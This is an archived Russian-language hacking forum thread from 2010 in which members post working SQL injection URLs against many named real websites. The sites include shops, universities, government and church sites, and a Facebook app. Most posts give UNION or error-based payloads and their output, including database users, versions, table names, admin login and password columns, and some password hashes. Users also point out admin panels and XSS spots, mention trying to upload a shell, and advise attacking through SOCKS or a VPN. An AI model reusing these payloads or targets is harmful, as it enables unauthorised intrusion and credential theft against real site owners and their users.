Просмотр полной версии : SQL Инъекции
Strilo4ka
31.03.2010, 04:24
_http://www.zonebbs.com/boards.php?t=10+and+%281,2%29=%28select+*+from%28s elect+name_const%28version%28%29,1%29,name_const%2 8version%28%29,1%29%29x%29--+5.0.51a-24+lenny2-log
_http://www.blindbargains.com/boards.php?t=66+and+%281,1%29=%28select+*+from+%28 select+name_const%28version%28%29,1%29,name_const% 28version%28%29,1%29%29x%29--+5.0.89-community
_http://www.glaciergaming.co.uk/gg/boards.php?t=list&rank=Queen%27+union+select+1,concat_ws%280x3a,user name,password%29,3,4,5,6,7,8,9,10,11,12,13+from+on ecms_users+--+_http://www.thatgamingsite.comФорма поиска ->поле name=search
%' union select 1,2,concat_ws(0x3a,database(),version(),user(),@@v ersion_compile_os,@@datadir),4,5,6,7,8,9,10,11 -- В самом низу!elven6_TGS:5.1.30:elven6_Mehar@localhost: pc-linux-gnu:/var/lib/mysql/
z0mbie86
31.03.2010, 12:56
определил сколько таблиц но всё равно ничего не получаеться:
http://www.platinumloops.com/detail.php?prod_id=182'+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
root_sashok
31.03.2010, 13:37
http://shop.megabug.co.uk/products.php?cat=96+union+select+1,2,3,concat_ws(0 x3a,1111,user(),database(),version()),5,6--
Username: megabug_admin@localhost
Database: megabug_shop
Version: 5.0.90-community
http://www.fot-on.com/files.php?cat=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3--
Username: myfoton@localhost
Database: myfoton
Version: 5.1.39-log
http://kerkenaships.com/catalogue_ar.php?cat=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),d atabase(),version())--
Username: kerkena_root@localhost
Database: kerkena_bateau
Version: 5.0.89-community
http://newyorkquilter.com/gallery.php?cat=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13--
Username: sewingandbeyond@localhost
Database: sewingandbeyond_com_maindb
Version: 5.0.67
http://planet-bison.com/catalogue.php?action=cat&idcat=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5--
Username: planetb@localhost
Database: planetb
Version: 5.0.44-log
http://www.otten.it/prodotti.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,user(),database(),version()),12,13,14--
Username: ottenit_user@localhost
Database: ottenit_main
Version: 5.0.89-community
http://rentakran.kz/ru/catalogue/category.php?cat=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8,9--
Username: ltech@localhost
Database: ltech
Version: 5.0.89-log
http://www.cobavin.com.br/imprimir.conteudo.php?id=1+union+select+1,2,3,conc at_ws(0x3a,user(),database(),version()),5,6,7,8,9, 10,11,12,13,14,15--
Username: cobavin@localhost
Database: cobavin
Version: 5.0.90
http://www.freefromfear.org/true.php?id=213-213%20union%20select%201,version%28%29,3,4,5,6,7%2 0--
http://www.freefromfear.org/true.php?id=213-213%20union%20select%201,concat_ws%280x3a,email,pa ssword%29,3,4,5,6,7%20from%20user%20-- Мыльник:Пасс =)
4.1.20-log
http://koleso-russia.ru/index.php?ob=news_one&id=-1%20UNION%20SELECT%201,concat_ws%280x3a,user%28%29 ,database%28%29,version%28%29%29,3,4,5,6,7,8%20--+
User: dbu_koleso2_1@192.168.8.96
Database: db_koleso2_1
Version: 5.0.77-log
PR: 5
Есть таблица Users с колонками login и pass. Админка тут - http://koleso-russia.ru/admin.php . В акциях в полях "Заголовок" и в самом тексте xss.
Strilo4ka
01.04.2010, 13:47
_http://acutecp.rediscussed.com/?p=-3%27+union+select+1,2,3,4,concat_ws%280x3a,usernam e,password%29,6,7,8,9,10,11+from+users--+
web_settings.php
...$result = mysql_query("SELECT `id`,`page_title`,`page_description`,`page_keyword s`,`page_content`,`page_status`,`page_views`,`page _created`,`page_last_edited`,`user_created`,`user_ last_edit` FROM `content` WHERE id='$p'",$conn) or die(mysql_error());
$page_result = mysql_fetch_row($result);...
http://pgroup.ru/?a=news&id=-1+union+select+1,aes_decrypt(aes_encrypt(concat(us er,0x3a,password,database(),version()),0x55),0x55) ,3,4,5+from+mysql.user
Version: 5.0.67-community-nt
User: root
Database: dprofit5
http://tuile.ru/more.php?do=more&catid=-1%20UNION%20SELECT%201,2,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,4,5,6,7,8,9,10, 11%20--+
User: gutter_tuile@212.193.229.91
Database: gutter_tu
Version: 5.1.41-log
http://www.vcspartak.ru/index.php?lang=ru&id=-1%20UNION%20SELECT%20concat_ws%280x3a,user%28%29,d atabase%28%29,version%28%29%29,2%20--+
User: vcspartak_mysql@10.1.3.44
Database: vcspartak_db
Version: 4.1.22-log
http://www.savatouristik.ru/index.php?mid_open=7&id=-1%20UNION%20SELECT%201,concat_ws%280x3a,user%28%29 ,database%28%29,version%28%29%29%20--+
User: client304@localhost
Database: savatour
Version: 4.0.27
BrainDeaD
01.04.2010, 23:29
http://www.sacvoiaj.md/admin/main.php?id=-1+union+select%20+1,2,3,concat_ws(0x3a,database(), version(),user()),5,6,7,8%20--
database: 18831
version: 5.0.77
user: 18831@localhost
http://www.mcpies.com/about_us/view_news.php?id=13333333+union+select+1,2,concat( VERSION(),0x3a,USER(),0x3a,DATABASE()),4,5,6,7,8,9 ,10,11+from+NewInTheNews/*
Version: 4.1.19-log
User: mariecallenders@localhost
Database: db_mcpies_com
http://sloboda.su/flats.php?id=-5+union+select+1,concat_ws(0x3a%20%20,user(),datab ase(),version()),3,4,5,6,7+from+sev_users
Version: 5.0.67-log
User: u68381@10.10.153.174
Database: u68381_sloboda
http://www.conscioustalk.net/resource_listing.php?cid=-10+union+select+1,concat_ws(0x3a%20%20,user(),data base(),version()),3,4,5,6,7,8,9,10,11,12,13--
Version: 5.0.27-standard
User: root@localhost
Database: ct
http://www.armeniatv.com/news.php?vid=-3737+union+select+1,2,3,4,5,6,7,8&year=2010&month=02&day=03
user() : armenia_armuser@localhost
version() : 5.0.90-community
database() : armenia_armeniadb
http://www.olimp-group.ru/index.php?ob=list_one&id=-1%20UNION%20SELECT%201,database%28%29,3,version%28 %29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,user%28%29,28,29,30,31,32,33,34,35, 36,37,38,39,40%20--+
User: olimpgro@localhost
Database: wwwolimpgroupru
Version: 4.1.25-log
jecka3000
02.04.2010, 17:53
Скуля на FACEBOOK!
http://apps.facebook.com/ifundrazr/fundraise.php?cid=-304+and+1=2+union+select+1,2,3,4,5,6,unhex(hex(con cat_ws(0x3a,user(),database(),@@version))),8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--
signalpa_rockaja@localhost
signalpa_fbmFundRraise
5.0.90-community
http://www.mens-groom.com/products.php?id=1'+and+1=2+union+all+select+1,2,3, 4,5,6,7,8,9,concat_ws(0x3a%20%20,user(),database() ,version()),11+from+users/*
User: reflexint@65.36.214.245
Version: reflexint
Database: 5.0.27-standard
http://mytoy.ru/cat.html?cat_id=300000000000000+UNION+SELECT+1,2,c oncat_ws(0x3a%20%20,user(),database(),version()),4 ,5/*
User: mytoyru_old@localhost
Version: 5.0.26-log
Database: mytoyru_old
http://www.luchvrn.ru/news.php?id=-999+union+select+1,2,3,concat_ws(0x3a%20%20,user() ,database(),version()),5,6,7
User: luchvrn8_news@localhost
Version: 4.1.25-log
Database: luchvrn8_news
http://www.tambovlib.ru/index.php?id=gallery.imgview.1234567%27+union+sele ct+1,concat_ws%280x3a,user%28%29,database%28%29,ve rsion%28%29%29,3,4,5,6,7,8,9,10+--+
User: lib@localhost
Database: lib
Version: 5.0.45
http://propel.ru/forum/see.php?id=-1%20UNION%20SELECT%201,2,3,4,concat_ws%280x3a,user %28%29,database%28%29,version%28%29%29,6,7,8,9,10, 11%20--+
User: propeltu_propel@localhost
Database: propeltu_propel
Version: 5.0.26-log
http://www.pulsarpkp.ru/content.php?id=-1%27%20UNION%20SELECT%20concat_ws%280x3a,user%28%2 9,database%28%29,version%28%29%29%20--+
User: Uwww3154S@localhost
Database: udb3154
Version: 4.0.26-log
Ну и PR семёра, не нашёл я админку :(
http://ar.economy.gov.ru/ru/index.php?incl/media/id.txt?&date23=-1%27+or%281,1%29=%28select+count%280%29,concat%28% 28select+concat_ws%280x3a,user%28%29,database%28%2 9,version%28%29%29+from+information_schema.tables+ limit+0,1%29,floor%28rand%280%29*2%29%29from%28inf ormation_schema.tables%29group+by+2%29--++
User: admreforma@localhost
Database: admreforma
Version: 5.0.51a-3ubuntu5.5-log1
CyberHunter
03.04.2010, 19:01
MSSQL
http://www.vineyardsproperties.com/about-us-details.asp?ID=27%27+or+1=%28SELECT+TOP+1+TABLE_NA ME+FROM+INFORMATION_SCHEMA.TABLES%29+--+
Version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
User: PEPE\IUSR_SYLVESTER
Database: vineyardsproperties
Сайт Акеллы:
http://www.akella.com/gameclub/rating.php?id=-227+union+select+concat_ws(0x3a%20%20,user(),datab ase(),version()),2,3,4,5,6+from+users--
User: akella@localhost
Database: gameclub
Version: 4.1.11
SWmoneymaker
03.04.2010, 23:54
какой то шоп:
http://www.dgh.com.au/product.php?id=7UNION+SELECT+CONCAT(0x7873716C696E 6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2 A2A2F,User(),0x7873716C696E6A656E64),2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18+LIMIT+1,1/*
Database Version: 4.1.22-standard-log
Database name: dghco_db
User name: dghco@10.194.10.143
UK shop:
http://www.stows.co.uk/index.php?_a=viewProd&productId=979'
Database Version: 5.0.45
сегодня видать тока шопы)
http://www.academy-clothes.co.uk/site/show_product.asp?SECTION=BRANDS&CATEGORY=&ID=&productid=56
Database Version: Microsoft SQl Server ???
Database name: Их там около десяти.
магаз коробок)
http://www.hazmatpackagingandsupplies.com/store/index.php?_a=viewProd&productId=2879
Database Version: 5.0.90
User: hazmatpa_store@localhost
Database: hazmatpa_store
http://www.letogroup.ru/news.php?id=-9999+union+select+1,concat_ws(0x3a%20%20,user(),da tabase(),version()),3,4/*
User: letogroup@localhost
Version: 4.1.22-lk-log
Database: letogroup
http://www.casinophiles.com/news.php?id=-1301+union+select+1,concat_ws(0x3a%20%20,user(),da tabase(),version()),3,4,5--
User: root@localhost
Version: 5.0.90-log
Database: extra
http://www.fctwente.nl/nieuws/index.php?item=9781+and+1=0+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12--
user() : fctwente@localhost
version() : 4.0.26-log
database() : fctwente_site
http://www.salcath.co.uk/news.php?id=-391+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,concat_ws(0x3a%20%20,user(),database(),ve rsion()),19,20,21,22,23--
User: SALISBURYCATHEDR@LOCALHOST
Version: 4.1.20
Database: SALISBURYCATHEDRAL
Google PR: 5
http://www.ssdistributors.com/title.php?id=-1+union+select+1,concat_ws(0x3a%20%20,user(),datab ase(),version()),3,4,5,6,7,8,9,10,11,12
User: ssdistributors@localhost
Version: ssdistributors
Database: 5.0.45
http://www.lemniscaat.nl/dynamic/genrelijst.php?genre=-28+union+select+1,2,3,4--
user() : pushki00_lemdbr@wh-www11.xs4all.nl
version() : 5.0.32-Debian_7etch8-log
database() : pushki00_lemdb
http://www.2kaudit.ru/services.php?id=-19+and+1=2+union+all+select+1,2,3,aes_decrypt(aes_ encrypt(concat_ws(0x3a,version(),user(),database() ),0x71),0x71),5,6,7,8,9,10,11,12--
version:4.0.27-log
user:2kaudit-ru@fhe2.hoster.ru
database:2kaudit-ru
http://www.profitcon.ru/index.php?page=our_seminars&pid=-100155+and+1=2+union+all+select+1,2,3,aes_decrypt( aes_encrypt(concat_ws(0x3a,name,password,email),0x 71),0x71),5,6,7,8,9,10,11,12,13,14+from+adkaudit_a dmin+limit+1+offset+0--
Китайский-порник
никак не могу залить шелл на скули(
version:5.0.77-log
user:awkw5@localhost
http://www.kikowu.com/members/index.php?cat=(select*from(select+count(*)from(sel ect+1+union+select+2+union+select+3)x+group+by%20c oncat(mid((select+user()+from+INFORMATION_SCHEMA.T ABLES+limit+0,1),1,64),floor(rand(0)*2)))z)
помоему надо залогиниться сначала:
http://bassdude:521111
http://www.kjerringoy.no/php/visside.php?id=-1+union+select+1,concat_ws(0x3a%20%20,user(),datab ase(),version()),3,4,5,6--
User: kjerring@10.0.0.43
Version: 4.1.22-standard-log
Database: kjerring
Google PR: 4
.:[melkiy]:.
05.04.2010, 18:46
тиц 2800 pr 5
http://uralpress.ru/fin/news.php?id=-14066+union+select+1,2,3,concat_ws(0x3a,version(), user(),database()),5,6,7,8+--+
http://www.villreinfangst.no/no/about.php?id=-2+union+select+1,concat_ws(0x3a%20%20,user(),datab ase(),version()),3
User: villrein_user@localhost
Version: 5.0.90
Database: villreinfangst
Google PR: 4
http://kachkov.net/poll2/vote.php?rez=-5+or+1=2+union+all+select+1,aes_decrypt(aes_encryp t(concat_ws(0x3a,version(),user(),database(),@@ver sion_compile_os),0x71),0x71),3--
version:5.0.89-community-log
user:kachkovn_kachkov@localhost
database:kachkovn_vse
os:unknown-linux-gnu
http://www.ainimoobel.ee/title.php?id=-1+union+select+concat_ws(0x3a%20%20,user(),databas e(),version())--
User: d3153sa4411@sn10.zone.eu
Version: d3153sd2397
Database: 5.1.37-log
http://www.apostrophegallery.com/08/panel.php?id=-1+union+select+1,2,3,concat_ws(0x3a%20%20,user(),d atabase(),version()),5
User: apostrophe@localhost
Version: apostrophe_2008
Database: 5.0.22-log
http://www.propool.ru/_tour/?gametype=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/concat_ws(0x3a,version(),user(),database(),@@versi on_compile_os)/**/--
version:5.0.67-log
user:vh04971@zvm7.host.ru
database:vh04971
os:redhat-linux-gnu
http://www.liposuctionlistings.com/link.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a%20%20,user() ,database(),version()),6+from+admin
User: smart131_smart@localhost
Version: 5.0.89-community
Database: smart131_smart
http://www.retirevic.com.au/about.php?id=-1+union+select+1,concat_ws(0x3a%20%20,user(),datab ase(),version()),3,4+from+rv_auth_user
User: retirmr@10.194.15.37
Version: 5.0.45-community-log
Database: retirmr_db
http://www.izvmor.ru/?id_refer=1539&vr=1&id_ask=-32+union+select+1,2,3,aes_decrypt(aes_encrypt(conc at_ws(0x3a,version(),user(),database()),0x71),0x71 )--
version:4.0.24_Debian-10sarge2-log
user:cms@localhost
database:izvmor
os:pc-linux-gnu
http://www.arblackhalloffame.org/honorees/Page.asp?id=-2+union+select+1,2,3,concat_ws(0x3a%20%20,user(),d atabase(),version()),5,6,7
User: arblackhall@68.178.211.60
Version: 4.0.27-max-log
Database: arblackhall
http://www.watt-knots.com/admin/help.php?id=-2+union+select+1,concat_ws(0x3a%20%20,user(),datab ase(),version()),3,4,5
User: dbo188864303@212.227.119.151
Version: 4.0.27-max-log
Database: db188864303
BlackAndWh1te
06.04.2010, 13:55
http://www.mediaprovinces.kz/index.php?r=8c=174'9
www.5pravil.ru
http://5pravil.ru/all_news.php?catId=0+union+all+select+1,2,concat_w s(0x3a,version(),database(),user()),4,5,6,7,8,9,10 ,11,12,13,14,15--
4.0.26-nt:data5:shopper@localhost
не удалось сбрутить таблицу содержащую пароль к админке ((
если у кого получится, скиньте в личку названия таблицы и полей
таблица mysql.user
user, password
root:51cb69927e78ff6f
shopper:6f28df956f7535ea
http://www.fuctifino.com/Shopping/help.php?id=-2+union+select+1,concat_ws(0x3a%20%20,user(),datab ase(),version()),3,4
User: dbo100132634@212.227.127.56
Version: 4.0.27-max-log
Database: db100132634
http://arts.tealray.com/company.php?id=-2+union+select+1,concat_ws(0x3a%20%20,user(),datab ase(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27+from+user
User: arts@192.168.1.102
Version: 5.0.51a-3ubuntu5.1
Database: arts
http://www.sto64.ru/catalog/?&id=-69+and+1=2+union+all+select+1,2,3,4,5,6,7,8,aes_de crypt(aes_encrypt(concat_ws(0x3a,version(),user(), database(),@@version_compile_os),0x71),0x71),10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32--
version:5.0.77-log
user:studa009_prmo@217.112.35.54
database:studa009_prmo
os:portbld-freebsd7.1
http://www.navigatormp.com/staff_detail.php?id=-2+union+select+1,2,3,4,5,concat_ws(0x3a%20%20,user (),database(),version()),7,8,9,10,11,12,13
User: db43810@64.13.192.21
Version: 4.1.25-Debian_mt1
Database: db43810_navigatormp_com
http://www.seaangels.ru/index.php?id=-5+and+1=2+union+all+select+1,concat_ws(0x3a,versio n(),user(),database(),@@version_compile_os),3,4,5, 6,7,8+--+
version:5.0.90-log
user:u46830@10.8.0.59
database:u46830
os:portbld-freebsd7.2
http://www.binkrm.ru/index.php?id_raz=-677+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database(),@@version_compile_os),5,6,7,8,9+--
version:5.0.75
user:u17071@78.108.81.151
database:b17071
os : portbld-freebsd7.1
http://www.mosoblproc.ru/news/?id=-1328+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),5,6
Database Version: 5.0.87-log
Database name: mosoblpr
User name: mosoblpr@212.42.42.42
Os : freebsd6.4
без носков или впн не лезть
Gorev
спасибо что предупредил))))))
http://hard-ekt.ru/index.php?all_news&details=-282+and+1=2+union+all+select+1,2,concat_ws(0x3a,ve rsion(),user(),database(),@@version_compile_os),4, 5,6,7,8,9,10,11+--
version:5.0.32-Debian_7etch10-log
user:hard-ekt@localhost
database:hard-ekt
os : pc-linux-gnu
http://hard-ekt.ru/index.php?all_news&details=-282+and+1=2+union+all+select+1,2,concat_ws(0x3a,lo gin,hash),4,5,6,7,8,9,10,11+from++wed_accounts+lim it+1+offset+0--
http://www.metallica.ru/news.php3?id=-500+union+select+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3--
Database Version: 4.1.16
Database name: meta2000
User name: acillatem@localhost
Os : redhat-linux-gnu
http://mankutianmolorak.com/main.php?page=gallery&lang=rus&subgal_id=0%20UNION%20SELECT%201,2,3,4,CONCAT_WS%2 8CHAR%2832,58,32%29,user%28%29,database%28%29,vers ion%28%29%29
vardanin_mankuti@localhost : vardanin_mankutian : 5.1.45-log
P.S.: табл: mankutian_users (поля: login,password)
http://www.ireland.anglican.org/index.php?do=information&id=63+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13--
user() : cofiadmin@server213-171-218-65.livedns.org.uk
version() : 5.0.45-log
database() : cofi
http://www.altaysv.ru/news/?id=-266+union+select+1,2,3,unhex(hex(concat_ws(0x3a,ve rsion(),database(),user(),@@version_compile_os))), 5,6,7,8
Database Version: 4.1.7
Database name: altsv_www
User name: www_user@localhost
Os : redhat-linux-gnu
http://7days.am/index.php?p=-1 UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version ())&c=18&l=rus&country=1
days7amuser@localhost : days7am : 4.1.9
CyberHunter
06.04.2010, 23:04
http://www.fotoline.ru/divisions.php?id=-123+union+select+1,2,3,4+--+
User: fotoline_foto@localhost
Database: fotoline_shop
Version: 4.1.22-standard
Вот это посмотрите :D :D :D
http://www.soldatru.ru/read.php?id=123+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14+--+
http://www.all-robots.info/news/?id=-1273+and+1=2+union+all+select+1,2,3,aes_decrypt(ae s_encrypt(concat_ws(0x3a,version(),user(),database (),@@version_compile_os),0x71),0x71),5,6,7--
version:5.0.81
user:root@localhost
database:allrobot
os : portbld-freebsd7.2
http://www.kotofeyka.ru/index.php?pages=-2+AND+1=2+UNION+ALL+SELECT+1,2,3,aes_decrypt(aes_e ncrypt(concat_ws(0x3a,version(),user(),database(), @@version_compile_os),0x71),0x71)--+
version:5.0.32-Debian_7etch11-log
user:z70756_kot@77.221.130.5
database:z70756_kot
os : pc-linux-gnu
http://www.in2.gr/dhouse.php?id=-1735+UNION%20SELECT%201,2,concat_ws(0x3a%20,user() ,database(),version()),4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20--
User: in2_user@localhost
Version: 5.0.90-community-log
Database: in2_db
Google PR: 4
http://intensive.ru/php/content.php?group=3¶m=-868+and+1=2+union+all+select+1,aes_decrypt(aes_enc rypt(concat_ws(0x3a,version(),user(),database(),@@ version_compile_os),0x71),0x71),3--
version:5.0.67-log
user:u14392@10.10.11.169
database:u14392
os : unknown-freebsd6.3
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,use rname,password),9,10,11+from+tbladmin--
http://www.j-diocese.org/newsdetail.php?id=-34+union+select+1,2,3,group_concat(id,0x3a3a,login ,0x3a3a,password),5+from+base_user--
http://www.fairfieldcountylook.com/gallery.php?id=-7+union+select+1,2,3,4,5,group_concat(0x0b,TABLE_N AME),7,8,9,10+from+information_schema.tables--
http://www.navigatorrecords.ru/shownews.php?code=-51+union+select+1,2,concat_ws(0x3a3a,admin_login,a dmin_pass),4,5,6+from+navigator_admin-
http://www.imagine-parfum.ru/cosmo_group.php?type=-2+union+select+1,group_concat(0x0b,TABLE_NAME),3,4 ,5,6+from+information_schema.tables--&select=cosmo
http://www.che-esche.com/fullafisha.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,group_concat( 0x0b,id,0x3a3a,login,0x3a3a,pwd),12,13,14,15+from+ login_tbl--
http://www.vero-software.com/products.php?page_id=-1+union+select+1,2,3,4
user() : root@localhost
version() : 5.0.45-community-nt
database() : vero_english
OS : винда
есть таблица user (select denied)
http://www.main.cne.gov.pr/servicios.php?id=-1+UNION%20SELECT%20concat_ws(0x3a%20,user(),databa se(),version()),2--
User: cnegovpr@cgi0605.int.bizland.net
Version: 5.0.83-log
Database: cnegovpr
http://www.yarochester.info/news.php?id=-1%20UNION%20SELECT%201,concat_ws%280x3a,user%28%29 ,database%28%29,version%28%29%29,3,4,5,6%20--+
PR:4
User: dbo98190732@74.208.16.3
Database: db98190732
Version: 4.0.27-max-log
http://www.prevencia.info/index.php?akcia=aktuality&id=-111%20Union%20select%201,2,concat_ws%280x3a,user%2 8%29,database%28%29,version%28%29%29,4,5,6,7,8,9,1 0,11,12%20--+
User: stareprevencia_info@10.10.11.72
Database: stareprevencia_info
Version: 4.0.27-log
DezMond™
07.04.2010, 16:22
inova.snv.jussieu.fr
http://inova.snv.jussieu.fr/evenements/colloques/colloques/actes.php?c=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws( 0x3a3a,autId,autArtId,autCoId,autNom,autPrenom),13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34+from+auteur+--+&l=fr
eclerdjdivision.com пр5 тиц10
http://www.eclerdjdivision.com/apartat.php?ap=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18+--+&lang=
skintech.info пр4
http://www.skintech.info/index_en.php?p=actualites&actualite=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
speedclic.fr пр2
http://www.speedclic.fr/vaucluse/index.php?page=yellow&lang=russian&bjid=24&cid=84&sid=-113+UniON+SElecT+1+--+&ccid=0
jfd.fr пр4
http://www.jfd.fr/index.php?ob=page&th_id=3&rub_id=20&art_id=136+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31+--+&PHPSESSID=d2e7faab5e44bdc82f6ae6cfde2e132c
fecafootonline.com пр6 тиц20
http://www.fecafootonline.com/?lng=1&module=media&idrub=-97075+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+&idnews=82452
fusac.fr пр5
http://www.fusac.fr/en/links.php?op=viewlink&cid=-11+union+select+1,2,3,4,5,6,7,8+--+
crai.archi.fr пр6 тиц10
http://www.crai.archi.fr/ninter-Dev/detail_publi.php?publi=-466+union+select+1,2,3,4,5,6,7,8,9+--+
csi.ensmp.fr пр6 тиц10
http://www.csi.ensmp.fr/indexpop.php?page=popA&IdP=-49+union+select+1,2,3+--+&lang=en
ctnerhi.com.fr пр6
http://www.ctnerhi.com.fr/enews/flash/index.php?cid=-48+union+select+1+from+auteurs+--+
reseau-doc.fr пр5
http://www.reseau-doc.fr/reseau_doc/detail_membre.php?id=-31'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 +--+
liafa.jussieu.fr пр7 тиц40
http://www.liafa.jussieu.fr/web9/rapportrech/description_en.php?idrapportrech=-178+union+select+1,2,3,4,5,6,7,8,9,10,1,12+--+
emka.fr пр5
http://www.emka.fr/index.php?page=29&software=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
perception.inrialpes.fr пр6
http://perception.inrialpes.fr/Publications/index.php?idAuthor=-78+unIOn+sELEct+1,2+--+
emkatech.com пр5
http://emkatech.com/index.php?page=-41+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16+--+
eco-grandnancy.com пр5
http://www.eco-grandnancy.com/francais/5/actualites.php4?quelThm=-12+uNIon+sELEct+1,u_login,3,4,5,6,7,8,9,10,11,12,1 3,14+from+user+--+
univ-montp2.fr пр8 тиц110
http://www.univ-montp2.fr/index.php?page=fiche&categorie=12&ficheid=-84+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42+--+
hksyu.edu.hk пр6
http://www.hksyu.edu.hk/lib/php/libnotices/NoticeDetail.php?ID=-81+union+select+1,2,3,concat_ws(0x3a3a,EngName,Pat ronBarCode,pw,ptype),5,6+from+PatronStaff+where+pt ype=100+--+
psychology.net.ru пр3 тиц1500
http://psychology.net.ru/tests/testing.html?cat_id=-2'+union+select+concat_Ws(0x3a3a,login,passw,email ,status,moderator,priv)+from+pw_club_users+where+m oderator%3E0+--+
brg.prd.fr пр6
http://www.brg.prd.fr/brg/pages/publication/actes.php?id_colloque=66&id_chapitre=-75+uNIon+seLEct+1,2,3,4,5+/*+
andalucia-comunicacion.com
http://www.andalucia-comunicacion.com/index_en.php?p=actualites&actualite=1+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2+--+
globalanti.rami.ru пр3 тиц20
http://www.globalanti.rami.ru/news.php?cat_id=2&doc_id=-511+union+select+1,2,3,4,5,user_login,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21+from+users+--+
bigbriar.com пр5 тиц90
http://www.bigbriar.com/news/?cat_id=-229'+union+select+1+--+
fitshopsupplements.co.uk пр1
http://www.fitshopsupplements.co.uk/product_desc.php?id=-306+union+select+1,2,3,4,admin_password,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+ad min+--+
obuobafmonline.com пр1
http://www.obuobafmonline.com/news.php?news_id=-1215+union+select+1,2,3,table_name+from+informatio n_schema.tables+--+&cat_id=4
brumont.fr пр4
http://www.brumont.fr/vins.php?idCat=1'+union+select+1,2,3,4,5,6,7,8+--+&langue=en
reseau-medicaments.qc.ca пр4
http://www.reseau-medicaments.qc.ca/membres/detail_membre.php?id=-73+union+select+1,concat_ws(0x3a3a,id,prefix,preno m,nom,titre,affiliation),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20+from+membres+--+
ve-group.ru пр3 тиц90
http://www.ve-group.ru/forum.html?msid=-227+union+select+1,2,3,4+--+&club=1
i4ga.com пр1
http://i4ga.com/forum.html?msid=-2+union+select+1,2,3,4,5+from+site_menu+--+&club=1'
ve-sim.ru пр2
http://www.ve-sim.ru/forum.html?msid=-4+union+select+1,2,3,4,5+--+&club=1
masterbau.ru
http://www.masterbau.ru/forum.html?msid=-4+union+select+1,2,3,4,5+from+jos_modules_menu+--+&club=1
oxbow.fr пр5
http://www.oxbow.fr/news.php?news_id=-463+union+select+1,2,3,4,5,6,7,8,9+--+
africedu.ecam.fr пр4
http://africedu.ecam.fr/news.php?news_id=-46+union+select+1,2,3,4,5,6,7+--+
envirolite.fr
http://www.envirolite.fr/news.php?news_id=-2+union+select+1,2,3,admin_password,5+from+admin+--+
angelusconfeccoes.com.br
http://www.angelusconfeccoes.com.br/index.php?pag=-3+union+select+1,concat_ws(0x3a3a,id,login,senha,u ltimo_logon,entidade)+from+ca_usuario+--+
siglobal.com.br пр2
http://www.siglobal.com.br/index.php?acao=exibe_append&cod=-15+union+select+1,2,3,4,5,6,7,8+--+&categoriaid=6&cat=Para
flover.fr пр1
http://www.flover.fr/news.php?news_id=-13+union+select+1,2,concat_ws(0x3a3a,email,usernam e,password),4,5,6,7+from+flovers_configuration+--+&PHPSESSID=a3ed0e86918c446dbef327a054507529
pixma.fr пр2
http://pixma.fr/tutoriel-photoshop.php?id=-2+union+select+1,2,3,4+--+
dobrobyt.org
http://dobrobyt.org/news.php?news_id=-89+union+select+1,2,3,4,concat_ws(0x3a3a,username, user_password),6,7,8,9,10,11,12+from+phpbb3_users+ limit+1,1+--+
perch-cic.org пр6
http://www.perch-cic.org/news.php?news_id=-3+union+select+1,2,3,4,5,6,7+--+
reklama-pushkino.org
http://www.reklama-pushkino.org/news.php?news_id=-19'+union+select+1,2,3,4,5,6,7,8+--+
upon.ru пр3
http://www.upon.ru/domknigi/homebook.php?part=contact&idsub=-5+uNIon+seLEct+1+--+
en.sbertos.org
http://en.sbertos.org/news.php?news_id=-1+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13, 14,15+--+
hbma.org пр5 тиц10
